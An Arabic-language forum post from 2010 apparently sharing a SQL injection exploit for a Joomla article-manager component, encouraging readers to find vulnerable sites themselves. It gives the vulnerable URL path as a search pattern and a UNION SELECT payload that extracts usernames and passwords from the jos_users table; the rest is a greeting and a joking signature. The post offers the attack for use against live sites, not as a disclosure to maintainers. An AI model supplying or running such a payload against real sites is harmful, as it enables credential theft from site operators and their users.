عرض مشاركة واحدة
قديم 01-15-2010, 01:56 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
M!M0
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي ثغرة في سكريبت جمولة


السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت جمولة

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
index.php?option=com_articlemanager&Itemid=349&task=display&artid
طريقة الإستغلال

كود PHP:
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users-- 
الثغرة من إكتشاف

FL0RiX


إن شاء الله تستفيدوا

موفقين بإذن الله ...



eyvm td s;vdfj [l,gm

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 

   

رد مع اقتباس